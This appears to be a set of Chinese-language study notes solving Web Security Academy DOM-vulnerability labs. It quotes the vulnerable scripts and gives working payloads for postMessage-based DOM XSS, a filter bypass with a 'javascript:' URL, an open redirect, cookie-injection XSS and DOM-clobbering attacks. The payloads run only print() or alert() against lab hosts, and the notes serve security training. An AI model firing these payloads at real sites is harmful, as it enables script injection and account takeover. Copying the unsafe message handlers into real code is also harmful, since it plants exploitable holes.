使用网络消息的 DOM XSS
<script>
window.addEventListener('message', function (e) {
//e代表event事件
document.getElementById('ads').innerHTML = e.data;
})
</script>
IFrame消息传递
http://runxinzhi.com/ms-grf-p-11545290.html
<iframe src="https://0a2f00890488e7a6c0f2c14d008b00e0.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
使用网络消息和 JavaScript URL 的 DOM XSS
<script>
window.addEventListener('message', function (e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>
这里做了过滤 但是有缺陷
<iframe src="https://0a21004d04ed6de4c03702320011003f.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"></iframe>
DOM XSS 使用网络消息和JSON.parse
<script>
window.addEventListener('message', function (e) {
var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
//这里是 先创建一个 iframe 接着将ACMEplayer的element赋值成iframe
document.body.appendChild(iframe);
try {
d = JSON.parse(e.data);
//解析event获取中的data
} catch (e) {
return;
}
switch (d.type) {
case "page-load":
ACMEplayer.element.scrollIntoView();
break;
case "load-channel":
ACMEplayer.element.src = d.url;
break;
case "player-height-changed":
ACMEplayer.element.style.width = d.width + "px";
ACMEplayer.element.style.height = d.height + "px";
break;
}
}, false);
</script>
<iframe src=https://0a3200ce04cdb6cdc0af6734007c006d.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'></iframe>
基于 DOM 的开放式重定向
https://0a39001b0312d431c0493d9400b70041.web-security-academy.net/post?postId=1&url=https://exploit-0aaa00b803e9d4d3c0323fda01ab001b.exploit-server.net/
基于 DOM 的 cookie 操作
会将cookie填入url
<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
cookie中存在一个url 这里将url 填入了cookie中去 其中我们可以尝试出 ’ 存在逃逸
<iframe src="https://0ac900e1049a54cdc054d67300df007f.web-security-academy.net/product?productId=2&'><script>print()</script>" onload="if(!window.x)this.src='https://exploit-0a5800e104835458c0ced85701d700b6.exploit-server.net/';window.x=1;">
利用 DOM 破坏来启用 XSS
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">
破坏 DOM 属性以绕过 HTML 过滤器
<form onclick=alert(1)><input id=attributes>Click me
<iframe src=https://0aae0085044793c3c0c84cc700c000db.web-security-academy.net/post?postId=3 onload="setTimeout(()=>this.src=this.src+'#x',500)">